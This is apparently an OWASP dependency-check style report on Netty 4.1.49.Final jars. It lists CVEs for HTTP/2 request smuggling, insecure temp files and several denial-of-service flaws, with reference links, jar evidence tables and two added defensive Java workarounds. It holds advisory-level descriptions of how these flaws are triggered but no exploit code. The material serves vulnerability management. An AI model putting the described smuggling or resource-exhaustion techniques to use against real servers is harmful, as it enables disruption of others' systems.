- [zookeeper-issues] 20210330 [jira] [Created] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-issues] 20210330 [jira] [Updated] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-issues] 20210331 [jira] [Assigned] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-issues] 20210331 [jira] [Commented] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-issues] 20210331 [jira] [Resolved] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-issues] 20210331 [jira] [Updated] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-issues] 20210401 [jira] [Commented] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-issues] 20210402 [jira] [Commented] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-issues] 20210928 [jira] [Created] (ZOOKEEPER-4390) CVE-2021-28169 - Upgrade jetty to 9.4.42
- [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 , - Upgrade jetty to 9.4.42
- [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 , CVE-2021-28163, - Upgrade jetty to 9.4.42
- [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 , CVE-2021-28163, CVE-2021-34428- Upgrade jetty to 9.4.42
- [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 - Upgrade jetty to 9.4.42
- [zookeeper-notifications] 20210331 [GitHub] [zookeeper] arshadmohammad closed pull request #1670: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-notifications] 20210331 [GitHub] [zookeeper] arshadmohammad commented on pull request #1669: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-notifications] 20210331 [GitHub] [zookeeper] arshadmohammad commented on pull request #1670: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-notifications] 20210331 [GitHub] [zookeeper] asfgit closed pull request #1669: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-notifications] 20210331 [GitHub] [zookeeper] ayushmantri opened a new pull request #1669: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-notifications] 20210331 [GitHub] [zookeeper] ayushmantri opened a new pull request #1670: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-notifications] 20210331 [GitHub] [zookeeper] eolivelli commented on pull request #1669: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- https://lists.apache.org/thread.html/r04a3e0d9f53421fb946c60cc54762b7151dc692eb4e39970a7579052%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/r16c4b55ac82be72f28adad4f8061477e5f978199d5725691dcc82c24%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/r2e93ce23e04c3f0a61e987d1111d0695cb668ac4ec4edbf237bd3e80%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/r490ca5611c150d193b320a2608209180713b7c68e501b67b0cffb925%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/r57245853c7245baab09eae08728c52b58fd77666538092389cc3e882%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/r6d32fc3cd547f7c9a288a57c7f525f5d00a00d5d163613e0d10a23ef%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/r8bcaf7821247b1836b10f6a1a3a3212b06272fd4cde4a859de1b78cf%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/r8db1d7b3b9acc9e8d2776395e280eb9615dd7790e1da8c57039963de%40%3Cnotifications.zookeeper.apache.org%3E
- https://lists.apache.org/thread.html/ra96c74c37ed7252f78392e1ad16442bd16ae72a4d6c8db50dd55c88b%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/racc191a1f70a4f13155e8002c61bddef2870b26441971c697436ad5d%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/rae198f44c3f7ac5264045e6ba976be1703cff38dcf1609916e50210d%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/rb523bb6c60196c5f58514b86a8585c2069a4852039b45de3818b29d2%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/rc73b8dd01b1be276d06bdf07883ecd93fe1a01f139a99ef30ba4308c%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/rcfc154eb2de23d2dc08a56100341161e1a40a8ea86c693735437e8f2%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/rd25c88aad0e76240dd09f0eb34bdab924933946429e068a167adcb73%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/rdb4db3f5a9c478ca52a7b164680b88877a5a9c174e7047676c006b2c%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/re4f70b62843e92163fab03b65e2aa8078693293a0c36f1cc260079ed%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/reafc834062486adfc7be5bb8f7b7793be0d33f483678a094c3f9d468%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/rf87b870a22aa5c77c27900967b518a71a7d954c2952860fce3794b60%40%3Ccommits.servicecomb.apache.org%3E
- CONFIRM - https://github.com/netty/netty/security/advisories/GHSA-wm47-8v5p-wjpj
- CONFIRM - https://security.netapp.com/advisory/ntap-20210604-0003/
- DEBIAN - DSA-4885
- MISC - https://github.com/Netflix/zuul/pull/980
- MISC - https://github.com/netty/netty/commit/89c241e3b1795ff257af4ad6eadc616cb2fb3dc4
- MISC - https://www.oracle.com/security-alerts/cpuapr2022.html
- OSSINDEX - [CVE-2021-21295] CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
- OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21295
- OSSIndex - https://github.com/netty/netty/security/advisories/GHSA-wm47-8v5p-wjpj
- OSSIndex - https://lists.apache.org/thread/ztx01jknlcoq0v6pp2cwl609dyzk9r5h
Vulnerable Software & Versions:
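The workaround the CVE-2021-21295 entry above describes (a custom `ChannelInboundHandler` placed in the child channel's pipeline behind `Http2StreamFrameToHttpObjectCodec`), as an added example; this is not Netty project code nor code from the scanned application. The CVE text scopes the problem to io.netty:netty-codec-http2 together with that codec, so the guard only applies where the HTTP/2 to HTTP/1.1 conversion exists and the HTTP/1.1 objects are forwarded to a backend. The class name `ContentLengthGuard`, its `install` helper and the 400-then-close reaction are this example's own choices; it assumes Netty 4.1.x (`netty-codec-http` and `netty-codec-http2`) on the classpath.

```java
import io.netty.channel.ChannelFutureListener;
import io.netty.channel.ChannelHandlerContext;
import io.netty.channel.ChannelInboundHandlerAdapter;
import io.netty.channel.ChannelPipeline;
import io.netty.handler.codec.http.DefaultFullHttpResponse;
import io.netty.handler.codec.http.HttpContent;
import io.netty.handler.codec.http.HttpHeaderNames;
import io.netty.handler.codec.http.HttpRequest;
import io.netty.handler.codec.http.HttpResponseStatus;
import io.netty.handler.codec.http.HttpVersion;
import io.netty.handler.codec.http.LastHttpContent;
import io.netty.handler.codec.http2.Http2StreamFrameToHttpObjectCodec;
import io.netty.util.ReferenceCountUtil;

import java.util.List;

/**
 * Added example (not Netty project code) of the CVE-2021-21295 workaround: a handler behind
 * Http2StreamFrameToHttpObjectCodec that validates Content-Length before the HTTP/1.1 objects
 * are proxied to a backend, so the backend never sees a body that disagrees with the header.
 * One instance per child channel; it keeps per-request state.
 */
public final class ContentLengthGuard extends ChannelInboundHandlerAdapter {

    private long expected = -1;   // -1: no Content-Length header on the current request
    private long seen;            // body bytes observed so far for the current request
    private boolean rejected;     // once true, everything is dropped until the stream closes

    /** Install order matters: the guard must sit after the HTTP/2 -> HTTP/1.1 conversion. */
    static void install(ChannelPipeline childPipeline) {
        childPipeline.addLast(new Http2StreamFrameToHttpObjectCodec(true)); // true = server side
        childPipeline.addLast(new ContentLengthGuard());
        // ... followed by the handler that forwards HttpRequest/HttpContent to the HTTP/1.1 backend
    }

    /**
     * Strict Content-Length parse: ASCII digits only, no sign, no whitespace, no overflow.
     * Returns -1 for anything an HTTP/1.1 peer might read differently than we do.
     */
    static long parseContentLength(String value) {
        if (value == null || value.isEmpty() || value.length() > 18) {
            return -1;
        }
        long n = 0;
        for (int i = 0; i < value.length(); i++) {
            char c = value.charAt(i);
            if (c < '0' || c > '9') {
                return -1;
            }
            n = n * 10 + (c - '0');
        }
        return n;
    }

    @Override
    public void channelRead(ChannelHandlerContext ctx, Object msg) {
        if (rejected) {
            ReferenceCountUtil.release(msg);
            return;
        }
        if (msg instanceof HttpRequest) {
            List<String> lengths = ((HttpRequest) msg).headers().getAll(HttpHeaderNames.CONTENT_LENGTH);
            seen = 0;
            if (lengths.isEmpty()) {
                expected = -1;
            } else if (lengths.size() > 1) {
                reject(ctx, msg, "multiple Content-Length headers");
                return;
            } else {
                expected = parseContentLength(lengths.get(0));
                if (expected < 0) {
                    reject(ctx, msg, "malformed Content-Length");
                    return;
                }
            }
        }
        if (msg instanceof HttpContent) {
            seen += ((HttpContent) msg).content().readableBytes();
            if (expected >= 0 && seen > expected) {
                // Bytes past the declared length would be parsed as a second request downstream.
                reject(ctx, msg, "body longer than Content-Length");
                return;
            }
            if (msg instanceof LastHttpContent && expected >= 0 && seen != expected) {
                // Declared length with a shorter (or empty) body: the backend would wait for,
                // or steal, bytes from whatever is sent next on the shared connection.
                reject(ctx, msg, "body shorter than Content-Length");
                return;
            }
        }
        ctx.fireChannelRead(msg);
    }

    private void reject(ChannelHandlerContext ctx, Object msg, String reason) {
        ReferenceCountUtil.release(msg);
        rejected = true;
        // 400 on this stream, then close it; nothing from the request reaches the backend.
        ctx.writeAndFlush(new DefaultFullHttpResponse(HttpVersion.HTTP_1_1, HttpResponseStatus.BAD_REQUEST))
           .addListener(ChannelFutureListener.CLOSE);
    }
}
```

The `LastHttpContent` branch is what the single-HEADERS-frame-with-END_STREAM case described under CVE-2021-21409 in this report turns on: a request that declares a Content-Length but arrives with an empty body fails the `seen != expected` check instead of being forwarded. The handler is defense in depth for a pipeline that cannot move off 4.1.49.Final immediately; the fix the entry names is the upgrade to 4.1.60.Final (4.1.61.Final for the follow-up).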
CVE-2021-21409
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty (io.netty:netty-codec-http2) before version 4.1.61.Final there is a vulnerability that enables request smuggling. The content-length header is not correctly validated if the request only uses a single Http2HeaderFrame with the endStream set to true. This could lead to request smuggling if the request is proxied to a remote peer and translated to HTTP/1.1. This is a follow-up of GHSA-wm47-8v5p-wjpj/CVE-2021-21295, which missed this one case. This was fixed as part of 4.1.61.Final. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2: Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N
CVSSv3: Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N
References:
Vulnerable Software & Versions:
CVE-2021-21290
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty before version 4.1.59.Final there is a vulnerability on Unix-like systems involving an insecure temp file. When netty's multipart decoders are used, local information disclosure can occur via the local system temporary directory if temporarily storing uploads on the disk is enabled. On Unix-like systems, the temporary directory is shared between all users. As such, writing to this directory using APIs that do not explicitly set the file/directory permissions can lead to information disclosure. Of note, this does not impact modern macOS operating systems. The method "File.createTempFile" on Unix-like systems creates a random file, but, by default, will create this file with the permissions "-rw-r--r--". Thus, if sensitive information is written to this file, other local users can read this information. This is the case in netty's "AbstractDiskHttpData", which is therefore vulnerable. This has been fixed in version 4.1.59.Final. As a workaround, one may specify one's own "java.io.tmpdir" when starting the JVM or use "DefaultHttpDataFactory.setBaseDir(...)" to set the directory to something that is only readable by the current user. CWE-378 Creation of Temporary File With Insecure Permissions, CWE-379 Creation of Temporary File in Directory with Incorrect Permissions
CVSSv2: Base Score: LOW (1.9) Vector: /AV:L/AC:M/Au:N/C:P/I:N/A:N
CVSSv3: Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
References:
Vulnerable Software & Versions:
CVE-2022-24823
Netty is an open-source, asynchronous event-driven network application framework. The package `io.netty:netty-codec-http` prior to version 4.1.77.Final contains an insufficient fix for CVE-2021-21290. When Netty's multipart decoders are used, local information disclosure can occur via the local system temporary directory if temporarily storing uploads on the disk is enabled. This only impacts applications running on Java version 6 and lower. Additionally, this vulnerability impacts code running on Unix-like systems, and very old versions of Mac OSX and Windows, as they all share the system temporary directory between all users. Version 4.1.77.Final contains a patch for this vulnerability. As a workaround, specify one's own `java.io.tmpdir` when starting the JVM or use DefaultHttpDataFactory.setBaseDir(...) to set the directory to something that is only readable by the current user. CWE-378 Creation of Temporary File With Insecure Permissions, CWE-379 Creation of Temporary File in Directory with Incorrect Permissions, CWE-668 Exposure of Resource to Wrong Sphere
CVSSv2: Base Score: LOW (1.9) Vector: /AV:L/AC:M/Au:N/C:P/I:N/A:N
CVSSv3: Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
References:
Vulnerable Software & Versions:
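The `DefaultHttpDataFactory.setBaseDir(...)` workaround that both CVE-2021-21290 and CVE-2022-24823 above point to, as an added example; this is not Netty project code nor code from the scanned application. It creates a directory that only the current user can enter, verifies the permission rather than trusting it, and hands that directory to the factory that spools multipart uploads to disk. The class name, the choice of a directory under the user's home and the `uploads-` prefix are this example's own assumptions; it assumes Netty 4.1.x (`netty-codec-http`) and a POSIX filesystem.

```java
import io.netty.handler.codec.http.multipart.DefaultHttpDataFactory;

import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.nio.file.attribute.PosixFilePermission;
import java.nio.file.attribute.PosixFilePermissions;
import java.util.EnumSet;
import java.util.Set;

/**
 * Added example (not Netty project code) for the CVE-2021-21290 / CVE-2022-24823 workaround:
 * keep multipart upload spooling out of the shared system temp directory by giving Netty's
 * DefaultHttpDataFactory a base directory that only the current user can read or enter.
 */
public final class PrivateUploadDir {

    /** Creates a 0700 directory under parent; fails closed if the permission did not stick. */
    static Path createOwnerOnlyDir(Path parent) throws IOException {
        Set<PosixFilePermission> ownerOnly = PosixFilePermissions.fromString("rwx------");
        Path dir = Files.createTempDirectory(parent, "uploads-",
                PosixFilePermissions.asFileAttribute(ownerOnly));
        // The attribute is applied at creation, but an ACL or an unusual filesystem can still
        // leave group/other bits set; check the result instead of assuming it.
        if (!isOwnerOnly(dir)) {
            Files.delete(dir);
            throw new IOException("could not restrict permissions on " + dir);
        }
        return dir;
    }

    /** True when no group or other permission bit is set on the directory. */
    static boolean isOwnerOnly(Path dir) throws IOException {
        Set<PosixFilePermission> actual = Files.getPosixFilePermissions(dir);
        Set<PosixFilePermission> ownerBits = EnumSet.of(
                PosixFilePermission.OWNER_READ,
                PosixFilePermission.OWNER_WRITE,
                PosixFilePermission.OWNER_EXECUTE);
        return ownerBits.containsAll(actual);
    }

    /** Factory that spools uploads to disk (useDisk = true), but only inside the private dir. */
    static DefaultHttpDataFactory diskFactory(Path privateDir) {
        DefaultHttpDataFactory factory = new DefaultHttpDataFactory(true);
        factory.setBaseDir(privateDir.toString()); // the workaround named in the advisory
        return factory;
    }

    public static void main(String[] args) throws IOException {
        // Assumption: a per-user location such as the home directory; /tmp is shared by all users,
        // which is exactly the condition the two advisories describe.
        Path home = Paths.get(System.getProperty("user.home"));
        Path dir = createOwnerOnlyDir(home);
        DefaultHttpDataFactory factory = diskFactory(dir);
        System.out.println("uploads spool under " + dir + " (owner-only: " + isOwnerOnly(dir) + ")");
        // The factory is then passed to new HttpPostRequestDecoder(factory, request) in the upload handler.
    }
}
```

`Files.createTempDirectory` with a POSIX attribute throws `UnsupportedOperationException` on a filesystem without POSIX permissions (Windows), which is the right outcome here: the code should not silently fall back to a world-readable location. The other workaround the entries list, a private `-Djava.io.tmpdir=` on the JVM command line, needs the same 0700 check on whatever directory it points at.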
netty-codec-mqtt-4.1.49.Final.jar
Description: Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers and clients.
License: http://www.apache.org/licenses/LICENSE-2.0
File Path: /var/simplicite/.m2/repository/io/netty/netty-codec-mqtt/4.1.49.Final/netty-codec-mqtt-4.1.49.Final.jar
MD5: 14e4d0ff5219c11a43001f55712d0735
SHA1: 5a71467b1a92cc3a7a6e8dd12dc69af33089a067
SHA256: b2f7bf31bececabdfdf65418831c358f4be61ce185e1b044bb274c0bf99e61a9
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | netty-codec-mqtt | High
Vendor | jar | package name | codec | Highest
Vendor | jar | package name | io | Highest
Vendor | jar | package name | netty | Highest
Vendor | Manifest | automatic-module-name | io.netty.codec.mqtt | Medium
Vendor | Manifest | bundle-docurl | https://netty.io/ | Low
Vendor | Manifest | bundle-symbolicname | io.netty.codec-mqtt | Medium
Vendor | Manifest | implementation-url | https://netty.io/netty-codec-mqtt/ | Low
Vendor | Manifest | Implementation-Vendor | The Netty Project | High
Vendor | Manifest | Implementation-Vendor-Id | io.netty | Medium
Vendor | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" | Low
Vendor | pom | artifactid | netty-codec-mqtt | Highest
Vendor | pom | artifactid | netty-codec-mqtt | Low
Vendor | pom | groupid | io.netty | Highest
Vendor | pom | name | Netty/Codec/MQTT | High
Vendor | pom | parent-artifactid | netty-parent | Low
Product | file | name | netty-codec-mqtt | High
Product | jar | package name | codec | Highest
Product | jar | package name | io | Highest
Product | jar | package name | netty | Highest
Product | Manifest | automatic-module-name | io.netty.codec.mqtt | Medium
Product | Manifest | bundle-docurl | https://netty.io/ | Low
Product | Manifest | Bundle-Name | Netty/Codec/MQTT | Medium
Product | Manifest | bundle-symbolicname | io.netty.codec-mqtt | Medium
Product | Manifest | Implementation-Title | Netty/Codec/MQTT | High
Product | Manifest | implementation-url | https://netty.io/netty-codec-mqtt/ | Low
Product | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" | Low
Product | pom | artifactid | netty-codec-mqtt | Highest
Product | pom | groupid | io.netty | Highest
Product | pom | name | Netty/Codec/MQTT | High
Product | pom | parent-artifactid | netty-parent | Medium
Version | Manifest | Bundle-Version | 4.1.49.Final | High
Version | Manifest | Implementation-Version | 4.1.49.Final | High
Version | pom | version | 4.1.49.Final | Highest
CVE-2021-37136
The Bzip2 decompression decoder function doesn't allow setting size restrictions on the decompressed output data (which affects the allocation size used during decompression). All users of Bzip2Decoder are affected. Malicious input can trigger an OOME and so a DoS attack. CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv2: Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2021-37137
The Snappy frame decoder function doesn't restrict the chunk length, which may lead to excessive memory usage. Besides this, it may also buffer reserved skippable chunks until the whole chunk has been received, which may lead to excessive memory usage as well. This vulnerability can be triggered by supplying malicious input that decompresses to a very big size (via a network stream or a file) or by sending a huge skippable chunk. CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv2: Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2022-41881
Netty project is an event-driven asynchronous network application framework. In versions prior to 4.1.86.Final, a StackOverflowError can be raised when parsing a malformed crafted message due to an infinite recursion. This issue is patched in version 4.1.86.Final. There is no workaround, except using a custom HaProxyMessageDecoder. CWE-674 Uncontrolled Recursion
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2023-44487
The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023. CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2021-43797
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. Netty prior to version 4.1.71.Final skips control chars when they are present at the beginning / end of the header name. It should instead fail fast, as these are not allowed by the spec and could lead to HTTP request smuggling. Failing to do the validation might cause netty to "sanitize" header names before it forwards these to another remote system when used as a proxy. This remote system can't see the invalid usage anymore, and therefore does not do the validation itself. Users should upgrade to version 4.1.71.Final. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2: Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N
CVSSv3: Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
References:
Vulnerable Software & Versions:
CVE-2023-34462
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. The `SniHandler` can allocate up to 16MB of heap for each channel during the TLS handshake. When the handler or the channel does not have an idle timeout, it can be used to make a TCP server using the `SniHandler` allocate 16MB of heap. The `SniHandler` class is a handler that waits for the TLS handshake to configure a `SslHandler` according to the server name indicated by the `ClientHello` record. For this matter it allocates a `ByteBuf` using the value defined in the `ClientHello` record. Normally the value of the packet should be smaller than the handshake packet, but no checks are done here and, the way the code is written, it is possible to craft a packet that makes the `SslClientHelloHandler`. This vulnerability has been fixed in version 4.1.94.Final. CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv3: Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2021-21295
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty (io.netty:netty-codec-http2) before version 4.1.60.Final there is a vulnerability that enables request smuggling. If a Content-Length header is present in the original HTTP/2 request, the field is not validated by `Http2MultiplexHandler` as it is propagated up. This is fine as long as the request is not proxied through as HTTP/1.1. If the request comes in as an HTTP/2 stream, gets converted into the HTTP/1.1 domain objects (`HttpRequest`, `HttpContent`, etc.) via `Http2StreamFrameToHttpObjectCodec` and is then sent up to the child channel's pipeline and proxied through to a remote peer as HTTP/1.1, this may result in request smuggling. In a proxy case, users may assume the Content-Length is validated somehow, which is not the case. If the request is forwarded to a backend channel that is an HTTP/1.1 connection, the Content-Length now has meaning and needs to be checked. An attacker can smuggle requests inside the body as it gets downgraded from HTTP/2 to HTTP/1.1. For an example attack refer to the linked GitHub Advisory. Users are only affected if all of this is true: `Http2MultiplexCodec` or `Http2FrameCodec` is used, `Http2StreamFrameToHttpObjectCodec` is used to convert to HTTP/1.1 objects, and these HTTP/1.1 objects are forwarded to another remote peer. This has been patched in 4.1.60.Final. As a workaround, the user can do the validation by themselves by implementing a custom `ChannelInboundHandler` that is put in the `ChannelPipeline` behind `Http2StreamFrameToHttpObjectCodec`. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2: Base Score: LOW (2.6) Vector: /AV:N/AC:H/Au:N/C:N/I:P/A:N
CVSSv3: Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N
References:
- [bookkeeper-issues] 20210330 [GitHub] [bookkeeper] eolivelli opened a new issue #2669: Update Netty to 4.1.60.final
- [flink-dev] 20210424 [jira] [Created] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx
- [flink-issues] 20210424 [jira] [Created] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx
- [flink-issues] 20210426 [jira] [Commented] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx
- [flink-issues] 20210426 [jira] [Updated] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx
- [flink-issues] 20210511 [jira] [Commented] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx
- [flink-issues] 20210610 [jira] [Updated] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx
- [flink-issues] 20210618 [jira] [Updated] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx
- [hbase-commits] 20210402 [hbase-thirdparty] branch master updated: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 (#48)
- [hbase-dev] 20210402 [jira] [Created] (HBASE-25728) [hbase-thirdparty] ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] Apache-HBase commented on pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295
- [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] HorizonNet commented on pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295
- [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] apurtell commented on pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295
- [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] apurtell merged pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295
- [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] apurtell opened a new pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295
- [hbase-issues] 20210402 [jira] [Assigned] (HBASE-25728) [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295
- [hbase-issues] 20210402 [jira] [Created] (HBASE-25728) [hbase-thirdparty] ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [hbase-issues] 20210402 [jira] [Updated] (HBASE-25728) [hbase-thirdparty] Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [hbase-issues] 20210402 [jira] [Updated] (HBASE-25728) [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295
- [jackrabbit-dev] 20210709 [GitHub] [jackrabbit-oak] blackat opened a new pull request #321: Update netty to resolve CVE-2021-21295 and BDSA-2018-4022
- [kafka-dev] 20210330 [jira] [Created] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295
- [kafka-dev] 20210401 [jira] [Resolved] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295
- [kafka-jira] 20210330 [jira] [Created] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295
- [kafka-jira] 20210330 [jira] [Updated] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295
- [kafka-jira] 20210331 [GitHub] [kafka] dongjinleekr commented on pull request #10448: KAFKA-12583: Upgrade of netty-codec due to CVE-2021-21295
- [kafka-jira] 20210331 [GitHub] [kafka] dongjinleekr opened a new pull request #10448: KAFKA-12583: Upgrade of netty-codec due to CVE-2021-21295
- [kafka-jira] 20210401 [jira] [Commented] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295
- [kafka-jira] 20210401 [jira] [Resolved] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295
- [kafka-jira] 20210402 [jira] [Assigned] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295
- [kudu-issues] 20210904 [jira] [Created] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60
